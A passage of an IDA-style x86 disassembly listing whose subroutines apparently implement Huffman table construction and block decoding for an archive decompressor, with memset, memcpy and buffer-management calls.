jb short loc_9AF6CA
jmp short loc_9AF6BA
sub_9AF4A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF6EC proc near ; CODE XREF: sub_9AF875+12A�p
; sub_9AF875+252�p ...
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
Dst = dword ptr -40h
var_3C = dword ptr -3Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 80h
push ebx
push esi
push edi
push 40h ; Size
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call memset
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_4]
mov eax, ebx
shl eax, 2
push eax ; Size
lea eax, [esi+84h]
push edi ; Val
push eax ; Dst
call memset
add esp, 18h
xor ecx, ecx
cmp ebx, edi
jle short loc_9AF73D
loc_9AF728: ; CODE XREF: sub_9AF6EC+4F�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [ecx+eax]
and eax, 0Fh
lea eax, [ebp+eax*4+Dst]
inc dword ptr [eax]
inc ecx
cmp ecx, ebx
jl short loc_9AF728
loc_9AF73D: ; CODE XREF: sub_9AF6EC+3A�j
lea edx, [esi+44h]
push 0Eh
mov [ebp+Dst], edi
mov [esi+4], edi
mov [edx], edi
mov [ebp+var_80], edi
mov [ebp+arg_4], edi
pop ecx
loc_9AF751: ; CODE XREF: sub_9AF6EC+99�j
mov eax, [ebp+edi+var_3C]
add eax, [ebp+arg_4]
mov ebx, 0FFFFh
shl eax, 1
mov [ebp+arg_4], eax
shl eax, cl
cmp eax, ebx
jle short loc_9AF76A
mov eax, ebx
loc_9AF76A: ; CODE XREF: sub_9AF6EC+7A�j
mov ebx, [edx]
mov [edx-3Ch], eax
mov eax, [ebp+edi+Dst]
add eax, ebx
add edx, 4
mov [ebp+edi+var_7C], eax
dec ecx
add edi, 4
cmp ecx, 0FFFFFFFFh
mov [edx], eax
jg short loc_9AF751
mov edx, [ebp+arg_8]
xor ecx, ecx
test edx, edx
jle short loc_9AF7BF
loc_9AF790: ; CODE XREF: sub_9AF6EC+D1�j
mov eax, [ebp+arg_0]
lea edi, [ecx+eax]
cmp byte ptr [edi], 0
jz short loc_9AF7BA
xor eax, eax
mov al, [edi]
and eax, 0Fh
mov eax, [ebp+eax*4+var_80]
mov [esi+eax*4+84h], ecx
xor eax, eax
mov al, [edi]
and eax, 0Fh
lea eax, [ebp+eax*4+var_80]
inc dword ptr [eax]
loc_9AF7BA: ; CODE XREF: sub_9AF6EC+AD�j
inc ecx
cmp ecx, edx
jl short loc_9AF790
loc_9AF7BF: ; CODE XREF: sub_9AF6EC+A2�j
pop edi
mov [esi], edx
pop esi
pop ebx
leave
retn
sub_9AF6EC endp
; =============== S U B R O U T I N E =======================================
sub_9AF7C6 proc near ; CODE XREF: sub_9AF875+160�p
; sub_9B030E+5EB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_9AF27D
mov ebx, [esp+10h+arg_4]
mov edi, eax
and edi, 0FFFEh
cmp edi, [ebx+24h]
pop ecx
jnb short loc_9AF81A
cmp edi, [ebx+14h]
jnb short loc_9AF801
cmp edi, [ebx+0Ch]
jnb short loc_9AF7F7
cmp edi, [ebx+8]
sbb esi, esi
inc esi
inc esi
jmp short loc_9AF84A
; ---------------------------------------------------------------------------
loc_9AF7F7: ; CODE XREF: sub_9AF7C6+26�j
cmp edi, [ebx+10h]
sbb esi, esi
add esi, 4
jmp short loc_9AF84A
; ---------------------------------------------------------------------------
loc_9AF801: ; CODE XREF: sub_9AF7C6+21�j
cmp edi, [ebx+1Ch]
jnb short loc_9AF810
cmp edi, [ebx+18h]
sbb esi, esi
add esi, 6
jmp short loc_9AF84A
; ---------------------------------------------------------------------------
loc_9AF810: ; CODE XREF: sub_9AF7C6+3E�j
cmp edi, [ebx+20h]
sbb esi, esi
add esi, 8
jmp short loc_9AF84A
; ---------------------------------------------------------------------------
loc_9AF81A: ; CODE XREF: sub_9AF7C6+1C�j
cmp edi, [ebx+34h]
jnb short loc_9AF838
cmp edi, [ebx+2Ch]
jnb short loc_9AF82E
cmp edi, [ebx+28h]
sbb esi, esi
add esi, 0Ah
jmp short loc_9AF84A
; ---------------------------------------------------------------------------
loc_9AF82E: ; CODE XREF: sub_9AF7C6+5C�j
cmp edi, [ebx+30h]
sbb esi, esi
add esi, 0Ch
jmp short loc_9AF84A
; ---------------------------------------------------------------------------
loc_9AF838: ; CODE XREF: sub_9AF7C6+57�j
cmp edi, [ebx+3Ch]
jnb short loc_9AF847
cmp edi, [ebx+38h]
sbb esi, esi
add esi, 0Eh
jmp short loc_9AF84A
; ---------------------------------------------------------------------------
loc_9AF847: ; CODE XREF: sub_9AF7C6+75�j
push 0Fh
pop esi
loc_9AF84A: ; CODE XREF: sub_9AF7C6+2F�j
; sub_9AF7C6+39�j ...
push esi
push [esp+10h+arg_0]
call sub_9AF25A
sub edi, [ebx+esi*4]
pop ecx
pop ecx
push 10h
pop ecx
sub ecx, esi
shr edi, cl
add edi, [ebx+esi*4+44h]
cmp edi, [ebx]
jb short loc_9AF86A
xor edi, edi
loc_9AF86A: ; CODE XREF: sub_9AF7C6+A0�j
mov eax, [ebx+edi*4+84h]
pop edi
pop esi
pop ebx
retn
sub_9AF7C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF875 proc near ; CODE XREF: sub_9AFB2B+44�p
; sub_9B030E+450�p ...
var_1AD = byte ptr -1ADh
Src = byte ptr -1ACh
var_81 = byte ptr -81h
var_45 = byte ptr -45h
var_34 = byte ptr -34h
var_18 = byte ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
mov esi, eax
mov eax, [esi+408018h]
sub eax, 19h
cmp [esi+408004h], eax
jle short loc_9AF8A5
push esi
push [ebp+arg_0]
call sub_9AF2B0
test eax, eax
pop ecx
pop ecx
jz loc_9AFB24
loc_9AF8A5: ; CODE XREF: sub_9AF875+1B�j
mov eax, [esi+408008h]
neg eax
and eax, 7
push eax
push esi
call sub_9AF25A
push esi
call sub_9AF27D
add esp, 0Ch
test ah, ah
jns short loc_9AF8F3
lea eax, [esi+40D79Ch]
push eax
push esi
push [ebp+arg_0]
mov dword ptr [esi+408020h], 1
add esi, 408B10h
push esi
call sub_9B24CC
add esp, 10h
neg eax
sbb eax, eax
neg eax
jmp loc_9AFB24
; ---------------------------------------------------------------------------
loc_9AF8F3: ; CODE XREF: sub_9AF875+4D�j
push ebx
xor ebx, ebx
test ah, 40h
mov [esi+408020h], ebx
mov [esi+408024h], ebx
mov [esi+408028h], ebx
jnz short loc_9AF922
push 194h ; Size
lea eax, [esi+40802Ch]
push ebx ; Val
push eax ; Dst
call memset
add esp, 0Ch
loc_9AF922: ; CODE XREF: sub_9AF875+96�j
push 2
push esi
call sub_9AF25A
pop ecx
pop ecx
push edi
loc_9AF92D: ; CODE XREF: sub_9AF875+11B�j
push esi
call sub_9AF27D
shr eax, 0Ch
movzx eax, al
push 4
push esi
mov [ebp+var_4], eax
call sub_9AF25A
mov eax, [ebp+var_4]
add esp, 0Ch
cmp eax, 0Fh
jnz short loc_9AF988
push esi
call sub_9AF27D
shr eax, 0Ch
push 4
push esi
movzx edi, al
call sub_9AF25A
add esp, 0Ch
test edi, edi
jnz short loc_9AF971
mov [ebp+ebx+var_18], 0Fh
jmp short loc_9AF98C
; ---------------------------------------------------------------------------
loc_9AF971: ; CODE XREF: sub_9AF875+F3�j
inc edi
inc edi
jmp short loc_9AF981
; ---------------------------------------------------------------------------
loc_9AF975: ; CODE XREF: sub_9AF875+10E�j
dec edi
cmp ebx, 14h
jnb short loc_9AF985
mov [ebp+ebx+var_18], 0
inc ebx
loc_9AF981: ; CODE XREF: sub_9AF875+FE�j
test edi, edi
jg short loc_9AF975
loc_9AF985: ; CODE XREF: sub_9AF875+104�j
dec ebx
jmp short loc_9AF98C
; ---------------------------------------------------------------------------
loc_9AF988: ; CODE XREF: sub_9AF875+D8�j
mov [ebp+ebx+var_18], al
loc_9AF98C: ; CODE XREF: sub_9AF875+FA�j
; sub_9AF875+111�j
inc ebx
cmp ebx, 14h
jl short loc_9AF92D
lea eax, [esi+408A20h]
push 14h
push eax
lea eax, [ebp+var_18]
push eax
call sub_9AF6EC
add esp, 0Ch
xor ebx, ebx
loc_9AF9A9: ; CODE XREF: sub_9AF875+222�j
mov eax, [esi+408018h]
sub eax, 5
cmp [esi+408004h], eax
jle short loc_9AF9CD
push esi
push [ebp+arg_0]
call sub_9AF2B0
test eax, eax
pop ecx
pop ecx
jz loc_9AFB27
loc_9AF9CD: ; CODE XREF: sub_9AF875+143�j
lea eax, [esi+408A20h]
push eax
push esi
call sub_9AF7C6
cmp eax, 10h
pop ecx
pop ecx
jge short loc_9AF9FA
mov cl, [ebx+esi+40802Ch]
add cl, al
and cl, 0Fh
mov [ebp+ebx+Src], cl
inc ebx
jmp loc_9AFA91
; ---------------------------------------------------------------------------
loc_9AF9FA: ; CODE XREF: sub_9AF875+16A�j
cmp eax, 12h
push esi
jge short loc_9AFA4E
cmp eax, 10h
jnz short loc_9AFA16
call sub_9AF27D
mov edi, eax
shr edi, 0Dh
add edi, 3
push 3
jmp short loc_9AFA25
; ---------------------------------------------------------------------------
loc_9AFA16: ; CODE XREF: sub_9AF875+18E�j
call sub_9AF27D
mov edi, eax
shr edi, 9
add edi, 0Bh
push 7
loc_9AFA25: ; CODE XREF: sub_9AF875+19F�j
push esi
call sub_9AF25A
add esp, 0Ch
jmp short loc_9AFA48
; ---------------------------------------------------------------------------
loc_9AFA30: ; CODE XREF: sub_9AF875+1D5�j
dec edi
cmp ebx, 194h
jge short loc_9AFA9D
mov al, [ebp+ebx+var_1AD]
mov [ebp+ebx+Src], al
inc ebx
loc_9AFA48: ; CODE XREF: sub_9AF875+1B9�j
test edi, edi
jg short loc_9AFA30
jmp short loc_9AFA91
; ---------------------------------------------------------------------------
loc_9AFA4E: ; CODE XREF: sub_9AF875+189�j
jnz short loc_9AFA61
call sub_9AF27D
mov edi, eax
shr edi, 0Dh
add edi, 3
push 3
jmp short loc_9AFA70
; ---------------------------------------------------------------------------
loc_9AFA61: ; CODE XREF: sub_9AF875:loc_9AFA4E�j
call sub_9AF27D
mov edi, eax
shr edi, 9
add edi, 0Bh
push 7
loc_9AFA70: ; CODE XREF: sub_9AF875+1EA�j
push esi
call sub_9AF25A
add esp, 0Ch
jmp short loc_9AFA8D
; ---------------------------------------------------------------------------
loc_9AFA7B: ; CODE XREF: sub_9AF875+21A�j
dec edi
cmp ebx, 194h
jge short loc_9AFA9D
mov [ebp+ebx+Src], 0
inc ebx
loc_9AFA8D: ; CODE XREF: sub_9AF875+204�j
test edi, edi
jg short loc_9AFA7B
loc_9AFA91: ; CODE XREF: sub_9AF875+180�j
; sub_9AF875+1D7�j
cmp ebx, 194h
jl loc_9AF9A9
loc_9AFA9D: ; CODE XREF: sub_9AF875+1C2�j
; sub_9AF875+20D�j
mov eax, [esi+408004h]
xor edi, edi
inc edi
cmp eax, [esi+408018h]
mov [esi+408014h], edi
jg short loc_9AFB27
push 12Bh
lea eax, [esi+4081C0h]
push eax
lea eax, [ebp+Src]
push eax
call sub_9AF6EC
push 3Ch
lea eax, [esi+4086F0h]
push eax
lea eax, [ebp+var_81]
push eax
call sub_9AF6EC
push 11h
lea eax, [esi+408864h]
push eax
lea eax, [ebp+var_45]
push eax
call sub_9AF6EC
push 1Ch
lea eax, [esi+40892Ch]
push eax
lea eax, [ebp+var_34]
push eax
call sub_9AF6EC
push 194h ; Size
lea eax, [ebp+Src]
push eax ; Src
add esi, 40802Ch
push esi ; Dst
call memcpy
add esp, 3Ch
mov eax, edi
loc_9AFB22: ; CODE XREF: sub_9AF875+2B4�j
pop edi
pop ebx
loc_9AFB24: ; CODE XREF: sub_9AF875+2A�j
; sub_9AF875+79�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_9AFB27: ; CODE XREF: sub_9AF875+152�j
; sub_9AF875+23D�j
xor eax, eax
jmp short loc_9AFB22
sub_9AF875 endp
; =============== S U B R O U T I N E =======================================
sub_9AFB2B proc near ; CODE XREF: sub_9B030E+723�p
arg_0 = dword ptr 4
push ebx
push edi
push esi
xor ebx, ebx
call sub_9AF27D
test ah, ah
pop ecx
jns short loc_9AFB40
xor edi, edi
inc edi
push edi
jmp short loc_9AFB4C
; ---------------------------------------------------------------------------
loc_9AFB40: ; CODE XREF: sub_9AFB2B+D�j
xor ebx, ebx
inc ebx
and eax, 4000h
mov edi, eax
push 2
loc_9AFB4C: ; CODE XREF: sub_9AFB2B+13�j
push esi
call sub_9AF25A
xor eax, eax
test edi, edi
setz al
test ebx, ebx
pop ecx
pop ecx
mov [esi+408014h], eax
jnz short loc_9AFB7E
test edi, edi
jz short loc_9AFB79
push [esp+8+arg_0]
mov eax, esi
call sub_9AF875
test eax, eax
pop ecx
jz short loc_9AFB7E
loc_9AFB79: ; CODE XREF: sub_9AFB2B+3C�j
xor eax, eax
inc eax
jmp short loc_9AFB80
; ---------------------------------------------------------------------------
loc_9AFB7E: ; CODE XREF: sub_9AFB2B+38�j
; sub_9AFB2B+4C�j
xor eax, eax
loc_9AFB80: ; CODE XREF: sub_9AFB2B+51�j
pop edi
pop ebx
retn
sub_9AFB2B endp
; =============== S U B R O U T I N E =======================================
sub_9AFB83 proc near ; CODE XREF: sub_9AFBCB+36�p
; sub_9B0206+C5�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
lea edi, [esi+40D7B0h]
mov eax, [edi]
test eax, eax
jz short loc_9AFBA0
push eax ; Memory
call free
and dword ptr [edi], 0
pop ecx
loc_9AFBA0: ; CODE XREF: sub_9AFB83+10�j
and dword ptr [esi+40D7B8h], 0
and dword ptr [esi+40D7B4h], 0
lea eax, [esi+40D7A0h]
push eax
call sub_9B12D7
add esi, 40D7A8h
push esi
call sub_9B12D7
pop ecx
pop ecx
pop edi
pop esi
retn
sub_9AFB83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AFBCB(char, void *Src)
sub_9AFBCB proc near ; CODE XREF: sub_9B0051+BD�p
; sub_9B012B+BE�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
Src = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
test [ebp+arg_0], 80h
push esi
mov [ebp+var_20], eax
mov eax, [ebp+Src]
push edi
mov edi, ecx
mov [ebp+var_1C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], ebx
jz short loc_9AFC0F
lea eax, [ebp+var_20]
push eax
call sub_9B2868
mov esi, eax
cmp esi, ebx
pop ecx
mov [ebp+var_4], esi
jnz short loc_9AFC09
push edi
call sub_9AFB83
pop ecx
jmp short loc_9AFC1A
; ---------------------------------------------------------------------------
loc_9AFC09: ; CODE XREF: sub_9AFBCB+33�j
dec esi
mov [ebp+var_4], esi
jmp short loc_9AFC1A
; ---------------------------------------------------------------------------
loc_9AFC0F: ; CODE XREF: sub_9AFBCB+20�j
mov eax, [edi+40D7B4h]
mov [ebp+var_4], eax
mov esi, eax
loc_9AFC1A: ; CODE XREF: sub_9AFBCB+3C�j
; sub_9AFBCB+42�j
mov eax, [edi+40D7A4h]
cmp esi, eax
ja loc_9AFEED
cmp esi, [edi+40D7B8h]
ja loc_9AFEED
xor ecx, ecx
cmp esi, eax
setz cl
mov [edi+40D7B4h], esi
cmp ecx, ebx
mov [ebp+var_10], ecx
jz short loc_9AFCC5
lea esi, [edi+40D7A0h]
push 1
push esi
call sub_9B122A
test eax, eax
pop ecx
pop ecx
jz loc_9AFEED
call sub_9B125E
mov ecx, [esi]
mov ebx, eax
mov eax, [edi+40D7A4h]
mov [ecx+eax*4-4], ebx
mov eax, [edi+40D7A4h]
mov ecx, [esi]
cmp dword ptr [ecx+eax*4-4], 0
mov [ebp+var_8], ebx
jz loc_9AFEED
inc dword ptr [edi+40D7B8h]
mov eax, [edi+40D7B8h]
shl eax, 2
push eax ; NewSize
lea esi, [edi+40D7B0h]
push dword ptr [esi] ; Memory
call sub_9B132C
test eax, eax
pop ecx
pop ecx
mov [esi], eax
jz loc_9AFEED
mov ecx, [edi+40D7B8h]
and dword ptr [eax+ecx*4-4], 0
and dword ptr [ebx+8], 0
xor ebx, ebx
jmp short loc_9AFCD4
; ---------------------------------------------------------------------------
loc_9AFCC5: ; CODE XREF: sub_9AFBCB+7B�j
mov eax, [edi+40D7A0h]
mov esi, [eax+esi*4]
inc dword ptr [esi+8]
mov [ebp+var_8], esi
loc_9AFCD4: ; CODE XREF: sub_9AFBCB+F8�j
call sub_9B125E
mov esi, eax
xor eax, eax
cmp [edi+40D7ACh], ebx
mov [ebp+var_C], ebx
mov [ebp+Src], eax
jbe short loc_9AFD2A
lea ebx, [edi+40D7A8h]
loc_9AFCF1: ; CODE XREF: sub_9AFBCB+159�j
mov ecx, [ebx]
mov ecx, [ecx+eax*4]
mov edx, eax
sub edx, [ebp+var_C]
mov eax, [ebx]
mov [eax+edx*4], ecx
mov ecx, [ebx]
mov eax, [ebp+Src]
lea ecx, [ecx+eax*4]
cmp dword ptr [ecx], 0
jnz short loc_9AFD10
inc [ebp+var_C]
loc_9AFD10: ; CODE XREF: sub_9AFBCB+140�j
mov edx, [ebp+var_C]
test edx, edx
jle short loc_9AFD1A
and dword ptr [ecx], 0
loc_9AFD1A: ; CODE XREF: sub_9AFBCB+14A�j
inc eax
cmp eax, [edi+40D7ACh]
mov [ebp+Src], eax
jb short loc_9AFCF1
test edx, edx
jnz short loc_9AFD3D
loc_9AFD2A: ; CODE XREF: sub_9AFBCB+11E�j
lea ebx, [edi+40D7A8h]
push 1
push ebx
call sub_9B122A
pop ecx
xor edx, edx
pop ecx
inc edx
loc_9AFD3D: ; CODE XREF: sub_9AFBCB+15D�j
mov eax, [edi+40D7ACh]
mov ecx, [ebx]
mov ebx, [ebp+var_8]
sub eax, edx
mov [ecx+eax*4], esi
mov eax, [ebx+8]
mov [esi+8], eax
lea eax, [ebp+var_20]
push eax
call sub_9B2868
test [ebp+arg_0], 40h
pop ecx
mov [ebp+Src], eax
jz short loc_9AFD6D
add [ebp+Src], 102h
loc_9AFD6D: ; CODE XREF: sub_9AFBCB+199�j
mov eax, [edi+40800Ch]
add eax, [ebp+Src]
and eax, 3FFFFFh
test [ebp+arg_0], 20h
mov [esi], eax
jz short loc_9AFD92
lea eax, [ebp+var_20]
push eax
call sub_9B2868
pop ecx
mov ecx, [ebp+var_4]
jmp short loc_9AFDAA
; ---------------------------------------------------------------------------
loc_9AFD92: ; CODE XREF: sub_9AFBCB+1B6�j
mov ecx, [ebp+var_4]
cmp ecx, [edi+40D7B8h]
jnb short loc_9AFDA8
mov eax, [edi+40D7B0h]
mov eax, [eax+ecx*4]
jmp short loc_9AFDAA
; ---------------------------------------------------------------------------
loc_9AFDA8: ; CODE XREF: sub_9AFBCB+1D0�j
xor eax, eax
loc_9AFDAA: ; CODE XREF: sub_9AFBCB+1C5�j
; sub_9AFBCB+1DB�j
mov [esi+4], eax
mov eax, [edi+408010h]
mov edx, [edi+40800Ch]
cmp eax, edx
jz short loc_9AFDCE
sub eax, edx
and eax, 3FFFFFh
cmp eax, [ebp+Src]
ja short loc_9AFDCE
xor eax, eax
inc eax
jmp short loc_9AFDD0
; ---------------------------------------------------------------------------
loc_9AFDCE: ; CODE XREF: sub_9AFBCB+1F0�j
; sub_9AFBCB+1FC�j
xor eax, eax
loc_9AFDD0: ; CODE XREF: sub_9AFBCB+201�j
mov edx, [esi+4]
mov [esi+0Ch], eax
mov eax, [edi+40D7B0h]
push 1Ch ; Size
mov [eax+ecx*4], edx
lea eax, [esi+34h]
push 0 ; Val
push eax ; Dst
call memset
mov eax, [esi+4]
mov [esi+44h], eax
mov eax, [esi+8]
add esp, 0Ch
test [ebp+arg_0], 10h
mov dword ptr [esi+40h], 3C000h
mov [esi+48h], eax
jz short loc_9AFE59
lea eax, [ebp+var_20]
push eax
call sub_9B283A
mov ebx, eax
lea eax, [ebp+var_20]
push 7
push eax
shr ebx, 9
call sub_9B2820
lea eax, [esi+34h]
add esp, 0Ch
and [ebp+Src], 0
mov [ebp+var_C], eax
loc_9AFE2E: ; CODE XREF: sub_9AFBCB+289�j
mov ecx, [ebp+Src]
xor eax, eax
inc eax
shl eax, cl
test ebx, eax
jz short loc_9AFE49
lea eax, [ebp+var_20]
push eax
call sub_9B2868
pop ecx
mov ecx, [ebp+var_C]
mov [ecx], eax
loc_9AFE49: ; CODE XREF: sub_9AFBCB+26D�j
inc [ebp+Src]
add [ebp+var_C], 4
cmp [ebp+Src], 7
jl short loc_9AFE2E
mov ebx, [ebp+var_8]
loc_9AFE59: ; CODE XREF: sub_9AFBCB+23B�j
cmp [ebp+var_10], 0
jz loc_9AFEFE
lea eax, [ebp+var_20]
push eax
call sub_9B2868
cmp eax, 1000h
pop ecx
mov [ebp+var_C], eax
jge short loc_9AFEED
test eax, eax
jz short loc_9AFEED
cmp eax, [ebp+var_1C]
jg short loc_9AFEED
test eax, eax
jl short loc_9AFEED
push eax ; Size
call sub_9B1311
test eax, eax
pop ecx
mov [ebp+Src], eax
jz short loc_9AFEED
xor ebx, ebx
cmp [ebp+var_C], ebx
jle short loc_9AFEBF
loc_9AFE99: ; CODE XREF: sub_9AFBCB+2F2�j
lea eax, [ebp+var_20]
push eax
call sub_9B283A
mov ecx, [ebp+Src]
shr eax, 8
mov [ecx+ebx], al
lea eax, [ebp+var_20]
push 8
push eax
call sub_9B2820
add esp, 0Ch
inc ebx
cmp ebx, [ebp+var_C]
jl short loc_9AFE99
loc_9AFEBF: ; CODE XREF: sub_9AFBCB+2CC�j
mov eax, [ebp+var_8]
add eax, 10h
push eax ; int
push [ebp+var_C] ; int
lea eax, [ebp+var_20]
push [ebp+Src] ; Src
add edi, 40D7CCh
push eax ; int
push edi ; int
call sub_9B3A12
add esp, 14h
test eax, eax
push [ebp+Src] ; Memory
jnz short loc_9AFEF4
call free
pop ecx
loc_9AFEED: ; CODE XREF: sub_9AFBCB+57�j
; sub_9AFBCB+63�j ...
xor eax, eax
loc_9AFEEF: ; CODE XREF: sub_9AFBCB+481�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9AFEF4: ; CODE XREF: sub_9AFBCB+319�j
call free
mov ebx, [ebp+var_8]
pop ecx
loc_9AFEFE: ; CODE XREF: sub_9AFBCB+292�j
mov eax, [ebx+10h]
mov [esi+18h], eax
mov eax, [ebx+30h]
mov [esi+30h], eax
mov edi, [ebx+2Ch]
test edi, edi
jle short loc_9AFF34
cmp edi, 2000h
jge short loc_9AFF34
push edi ; Size
call sub_9B1311
test eax, eax
pop ecx
mov [esi+20h], eax
jz short loc_9AFEED
push edi ; Size
push dword ptr [ebx+20h] ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
loc_9AFF34: ; CODE XREF: sub_9AFBCB+344�j
; sub_9AFBCB+34C�j
push 40h
pop edi
cmp [esi+28h], edi
jge short loc_9AFF63
push dword ptr [esi+1Ch] ; Memory
call free
push edi ; Size
call sub_9B1311
test eax, eax
pop ecx
pop ecx
mov [esi+1Ch], eax
jz short loc_9AFEED
push edi ; Size
push 0 ; Val
push eax ; Dst
call memset
add esp, 0Ch
mov [esi+28h], edi
loc_9AFF63: ; CODE XREF: sub_9AFBCB+36F�j
mov edi, [esi+1Ch]
mov [ebp+Src], edi
lea ebx, [esi+34h]
mov [ebp+var_10], 7
loc_9AFF73: ; CODE XREF: sub_9AFBCB+3C1�j
push dword ptr [ebx]
push [ebp+Src]
push 0
call sub_9B278D
add [ebp+Src], 4
add esp, 0Ch
add ebx, 4
dec [ebp+var_10]
jnz short loc_9AFF73
push dword ptr [esi+4]
lea eax, [edi+1Ch]
push eax
xor ebx, ebx
push ebx
call sub_9B278D
push ebx
lea eax, [edi+20h]
push eax
push ebx
call sub_9B278D
push dword ptr [esi+8]
lea eax, [edi+2Ch]
push eax
push ebx
call sub_9B278D
push 10h ; Size
push ebx ; Val
add edi, 30h
push edi ; Dst
call memset
add esp, 30h
test [ebp+arg_0], 8
jz short loc_9B0049
lea eax, [ebp+var_20]
push eax
call sub_9B2868
mov edi, eax
cmp edi, 10000h
pop ecx
jge loc_9AFEED
mov eax, [esi+28h]
lea ecx, [edi+40h]
cmp eax, ecx
jnb short loc_9B000E
mov ecx, edi
sub ecx, eax
add ecx, 40h
add [esi+28h], ecx
push dword ptr [esi+28h] ; NewSize
push dword ptr [esi+1Ch] ; Memory
call sub_9B132C
cmp eax, ebx
pop ecx
pop ecx
mov [esi+1Ch], eax
jz loc_9AFEED
loc_9B000E: ; CODE XREF: sub_9AFBCB+41F�j
mov esi, [esi+1Ch]
add esi, 40h
cmp edi, ebx
jle short loc_9B0049
loc_9B0018: ; CODE XREF: sub_9AFBCB+47C�j
mov eax, [ebp+var_18]
add eax, 2
cmp eax, [ebp+var_1C]
jg loc_9AFEED
lea eax, [ebp+var_20]
push eax
call sub_9B283A
shr eax, 8
mov [esi+ebx], al
lea eax, [ebp+var_20]
push 8
push eax
call sub_9B2820
add esp, 0Ch
inc ebx
cmp ebx, edi
jl short loc_9B0018
loc_9B0049: ; CODE XREF: sub_9AFBCB+3FD�j
; sub_9AFBCB+44B�j
xor eax, eax
inc eax
jmp loc_9AFEEF
sub_9AFBCB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0051 proc near ; CODE XREF: sub_9B030E+74D�p
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
call sub_9AF27D
mov ebx, eax
push 8
push edi
shr ebx, 8
call sub_9AF25A
mov esi, ebx
and esi, 7
add esp, 0Ch
inc esi
cmp esi, 7
jnz short loc_9B008B
push edi
call sub_9AF27D
mov esi, eax
shr esi, 8
add esi, 7
push 8
jmp short loc_9B009A
; ---------------------------------------------------------------------------
loc_9B008B: ; CODE XREF: sub_9B0051+26�j
cmp esi, 8
jnz short loc_9B00A3
push edi
call sub_9AF27D
mov esi, eax
push 10h
loc_9B009A: ; CODE XREF: sub_9B0051+38�j
push edi
call sub_9AF25A
add esp, 0Ch
loc_9B00A3: ; CODE XREF: sub_9B0051+3D�j
lea eax, [esi+2]
push eax ; Size
call sub_9B1311
test eax, eax
pop ecx
mov [ebp+Memory], eax
jz short loc_9B0127
and [ebp+var_4], 0
test esi, esi
jle short loc_9B0107
loc_9B00BC: ; CODE XREF: sub_9B0051+B4�j
mov eax, [edi+408018h]
dec eax
cmp [edi+408004h], eax
jl short loc_9B00E2
push edi
push [ebp+arg_0]
call sub_9AF2B0
test eax, eax
pop ecx
pop ecx
jnz short loc_9B00E2
lea eax, [esi-1]
cmp [ebp+var_4], eax
jl short loc_9B0127
loc_9B00E2: ; CODE XREF: sub_9B0051+78�j
; sub_9B0051+87�j
push edi
call sub_9AF27D
mov ecx, [ebp+var_4]
mov edx, [ebp+Memory]
shr eax, 8
push 8
push edi
mov [ecx+edx], al
call sub_9AF25A
add esp, 0Ch
inc [ebp+var_4]
cmp [ebp+var_4], esi
jl short loc_9B00BC
loc_9B0107: ; CODE XREF: sub_9B0051+69�j
mov eax, [ebp+Memory]
push esi ; Src
push ebx ; char
mov ecx, edi
call sub_9AFBCB
push [ebp+Memory] ; Memory
mov esi, eax
call free
add esp, 0Ch
mov eax, esi
loc_9B0123: ; CODE XREF: sub_9B0051+D8�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B0127: ; CODE XREF: sub_9B0051+61�j
; sub_9B0051+8F�j
xor eax, eax
jmp short loc_9B0123
sub_9B0051 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B012B proc near ; CODE XREF: sub_9B030E+525�p
var_C = byte ptr -0Ch
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
push [ebp+arg_0]
lea ebx, [edi+408B10h]
push ebx
call sub_9B25BF
mov esi, eax
add esp, 0Ch
cmp esi, 0FFFFFFFFh
mov dword ptr [ebp+var_C], esi
jz short loc_9B01B1
and esi, 7
inc esi
cmp esi, 7
jnz short loc_9B0170
push edi
push [ebp+arg_0]
push ebx
call sub_9B25BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_9B01B1
lea esi, [eax+7]
jmp short loc_9B01A0
; ---------------------------------------------------------------------------
loc_9B0170: ; CODE XREF: sub_9B012B+2C�j
cmp esi, 8
jnz short loc_9B01A0
push edi
push [ebp+arg_0]
push ebx
call sub_9B25BF
mov esi, eax
add esp, 0Ch
cmp esi, 0FFFFFFFFh
jz short loc_9B01B1
push edi
push [ebp+arg_0]
push ebx
call sub_9B25BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_9B01B1
shl esi, 8
add esi, eax
loc_9B01A0: ; CODE XREF: sub_9B012B+43�j
; sub_9B012B+48�j
lea eax, [esi+2]
push eax ; Size
call sub_9B1311
test eax, eax
pop ecx
mov [ebp+Memory], eax
jnz short loc_9B01B5
loc_9B01B1: ; CODE XREF: sub_9B012B+23�j
; sub_9B012B+3E�j ...
xor eax, eax
jmp short loc_9B01FE
; ---------------------------------------------------------------------------
